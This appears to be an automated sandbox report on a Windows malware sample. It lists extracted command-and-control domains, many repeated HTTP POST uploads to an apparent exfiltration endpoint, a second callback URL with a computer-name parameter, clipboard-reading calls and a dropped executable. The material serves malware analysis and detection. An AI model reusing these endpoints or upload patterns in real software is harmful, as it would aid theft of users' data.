Source: Malware configuration extractor	URLs: @sevtbb17sb.top
Source: Malware configuration extractor	URLs: icsevtbb17sb.top
Source: Malware configuration extractor	URLs: bb17sb.top

Source: Joe Sandbox View

ASN Name: CUBENODEES CUBENODEES

Source: global traffic	HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary69382044User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 412Host: sevtbb17sb.top
Source: global traffic	HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary69382044User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 412Host: sevtbb17sb.top
Source: global traffic	HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary69382044User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 412Host: sevtbb17sb.top
Source: global traffic	HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary69382044User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 412Host: sevtbb17sb.top
Source: global traffic	HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary69382044User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 412Host: sevtbb17sb.top
Source: global traffic	HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary69382044User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 412Host: sevtbb17sb.top
Source: global traffic	HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary69382044User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 412Host: sevtbb17sb.top
Source: global traffic	HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary69382044User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 412Host: sevtbb17sb.top
Source: global traffic	HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary69382044User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 412Host: sevtbb17sb.top
Source: global traffic	HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary69382044User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 412Host: sevtbb17sb.top
Source: global traffic	HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary69382044User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 412Host: sevtbb17sb.top
Source: global traffic	HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary69382044User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 412Host: sevtbb17sb.top
Source: global traffic	HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary69382044User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 412Host: sevtbb17sb.top
Source: global traffic	HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary69382044User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 412Host: sevtbb17sb.top
Source: global traffic	HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary69382044User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 412Host: sevtbb17sb.top
Source: global traffic	HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary69382044User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 412Host: sevtbb17sb.top
Source: global traffic	HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary69382044User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 412Host: sevtbb17sb.top
Source: global traffic	HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary69382044User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 412Host: sevtbb17sb.top
Source: global traffic	HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary69382044User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 412Host: sevtbb17sb.top
Source: global traffic	HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary69382044User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 412Host: sevtbb17sb.top
Source: global traffic	HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary69382044User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 412Host: sevtbb17sb.top
Source: global traffic	HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary69382044User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 412Host: sevtbb17sb.top
Source: global traffic	HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary69382044User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 412Host: sevtbb17sb.top
Source: global traffic	HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary69382044User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 412Host: sevtbb17sb.top
Source: global traffic	HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary69382044User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 412Host: sevtbb17sb.top
Source: global traffic	HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary35492427User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 62873Host: sevtbb17sb.top
Source: global traffic	HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary35492427User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 62873Host: sevtbb17sb.top
Source: global traffic	HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary35492427User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 62873Host: sevtbb17sb.top
Source: global traffic	HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary35492427User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 62873Host: sevtbb17sb.top
Source: global traffic	HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary35492427User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 62873Host: sevtbb17sb.top
Source: global traffic	HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary35492427User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 62873Host: sevtbb17sb.top
Source: global traffic	HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary35492427User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 62873Host: sevtbb17sb.top
Source: global traffic	HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary35492427User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 62873Host: sevtbb17sb.top
Source: global traffic	HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary35492427User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 62873Host: sevtbb17sb.top
Source: global traffic	HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary35492427User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 62873Host: sevtbb17sb.top
Source: global traffic	HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary85537434User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 29713Host: sevtbb17sb.top
Source: global traffic	HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary85537434User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 29713Host: sevtbb17sb.top
Source: global traffic	HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary85537434User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 29713Host: sevtbb17sb.top
Source: global traffic	HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary85537434User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 29713Host: sevtbb17sb.top
Source: global traffic	HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary85537434User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 29713Host: sevtbb17sb.top
Source: global traffic	HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary85537434User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 29713Host: sevtbb17sb.top
Source: global traffic	HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary85537434User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 29713Host: sevtbb17sb.top
Source: global traffic	HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary85537434User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 29713Host: sevtbb17sb.top
Source: global traffic	HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary85537434User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 29713Host: sevtbb17sb.top
Source: global traffic	HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary85537434User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 29713Host: sevtbb17sb.top
Source: global traffic	HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary85537434User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 29713Host: sevtbb17sb.top
Source: global traffic	HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary85537434User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 29713Host: sevtbb17sb.top
Source: global traffic	HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary85537434User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 29713Host: sevtbb17sb.top
Source: global traffic	HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary85537434User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 29713Host: sevtbb17sb.top
Source: global traffic	HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary85537434User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 29713Host: sevtbb17sb.top
Source: global traffic	HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary85537434User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 29713Host: sevtbb17sb.top
Source: global traffic	HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary85537434User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 29713Host: sevtbb17sb.top
Source: global traffic	HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary85537434User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 29713Host: sevtbb17sb.top
Source: global traffic	HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary85537434User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 29713Host: sevtbb17sb.top

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: sevtbb17sb.top

Source: unknown

HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary69382044User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 412Host: sevtbb17sb.top

Source: file.exe, 00000000.00000002.2987760536.00000000045C3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://sevtbb17sb.top/
Source: file.exe, 00000000.00000002.2986546316.000000000129A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://sevtbb17sb.top/-
Source: file.exe, 00000000.00000002.2986546316.0000000001318000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2986546316.000000000129A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://sevtbb17sb.top//
Source: file.exe, 00000000.00000002.2986546316.0000000001318000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://sevtbb17sb.top/3
Source: file.exe, 00000000.00000002.2986546316.0000000001318000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://sevtbb17sb.top/5
Source: file.exe, 00000000.00000002.2987760536.00000000045C3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://sevtbb17sb.top/9
Source: file.exe, 00000000.00000002.2986546316.0000000001318000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://sevtbb17sb.top/A
Source: file.exe, 00000000.00000002.2987760536.00000000045C3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://sevtbb17sb.top/M
Source: file.exe, 00000000.00000002.2986546316.0000000001318000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://sevtbb17sb.top/O
Source: file.exe, 00000000.00000002.2986546316.0000000001318000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://sevtbb17sb.top/Q
Source: file.exe, 00000000.00000002.2987760536.00000000045C3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://sevtbb17sb.top/X
Source: file.exe, 00000000.00000002.2986546316.000000000129A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://sevtbb17sb.top/_
Source: file.exe, 00000000.00000002.2986546316.0000000001318000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://sevtbb17sb.top/j
Source: file.exe, 00000000.00000002.2987760536.00000000045C3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://sevtbb17sb.top/q
Source: file.exe, 00000000.00000002.2987384253.0000000004510000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://sevtbb17sb.top/v1/upload.php
Source: file.exe, 00000000.00000002.2986546316.000000000129A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://sevtbb17sb.top/v1/upload.php$
Source: file.exe, 00000000.00000002.2987384253.0000000004510000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://sevtbb17sb.top/v1/upload.php(
Source: file.exe, 00000000.00000002.2987384253.0000000004510000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://sevtbb17sb.top/v1/upload.php.
Source: file.exe, 00000000.00000002.2986546316.000000000129A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://sevtbb17sb.top/v1/upload.php0
Source: file.exe, 00000000.00000002.2987384253.0000000004510000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://sevtbb17sb.top/v1/upload.php4
Source: file.exe, 00000000.00000002.2986546316.000000000129A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://sevtbb17sb.top/v1/upload.php6
Source: file.exe, 00000000.00000002.2987967621.000000000E076000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://sevtbb17sb.top/v1/upload.php6c
Source: file.exe, 00000000.00000002.2987384253.0000000004510000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://sevtbb17sb.top/v1/upload.php:
Source: file.exe, 00000000.00000002.2987384253.0000000004510000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://sevtbb17sb.top/v1/upload.phpB
Source: file.exe, 00000000.00000002.2986546316.000000000129A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2987384253.0000000004510000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://sevtbb17sb.top/v1/upload.phpH
Source: file.exe, 00000000.00000002.2986546316.000000000129A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://sevtbb17sb.top/v1/upload.phpP
Source: file.exe, 00000000.00000002.2987384253.0000000004510000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://sevtbb17sb.top/v1/upload.phpd
Source: file.exe, 00000000.00000002.2987384253.0000000004510000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://sevtbb17sb.top/v1/upload.phpevN
Source: file.exe, 00000000.00000002.2986546316.000000000129A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2987384253.0000000004510000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://sevtbb17sb.top/v1/upload.phpj
Source: file.exe, 00000000.00000002.2986546316.000000000129A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2987384253.0000000004510000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://sevtbb17sb.top/v1/upload.phpp
Source: file.exe, 00000000.00000002.2986546316.000000000129A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://sevtbb17sb.top/v1/upload.phps
Source: file.exe, 00000000.00000002.2987384253.0000000004510000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://sevtbb17sb.top/v1/upload.phpv
Source: file.exe, 00000000.00000002.2986546316.000000000129A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://sevtbb17sb.top/z
Source: file.exe, 00000000.00000003.2303730585.0000000001BF9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: file.exe, 00000000.00000003.2303730585.0000000001BF9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000003.2303730585.0000000001BF9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000003.2303730585.0000000001BF9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: file.exe, 00000000.00000003.2303730585.0000000001BF9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: file.exe, 00000000.00000003.2303730585.0000000001BF9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: file.exe, 00000000.00000003.2303730585.0000000001BF9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: uAGceqKEYCLcAMToKQDI.dll.0.dr	String found in binary or memory: https://gcc.gnu.org/bugs/):
Source: file.exe, file.exe, 00000000.00000003.2984794931.000000006A367000.00000002.00001000.00020000.00000000.sdmp	String found in binary or memory: https://keruzam.com/update.php?compName=
Source: file.exe, 00000000.00000003.2303730585.0000000001BF9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: file.exe, 00000000.00000003.2303730585.0000000001BF9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Source: C:\Users\user\AppData\Local\Temp\service123.exe

Code function: 6_2_6C2F9B99 OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,CloseClipboard,GetClipboardSequenceNumber,

6_2_6C2F9B99

Source: C:\Users\user\AppData\Local\Temp\service123.exe

Code function: 6_2_6C2F9B99 OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,CloseClipboard,GetClipboardSequenceNumber,

6_2_6C2F9B99

System Summary

Drops large PE files

Source: C:\Users\user\Desktop\file.exe

File dump: service123.exe.0.dr 314617856

Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 6_2_002D51B0	6_2_002D51B0
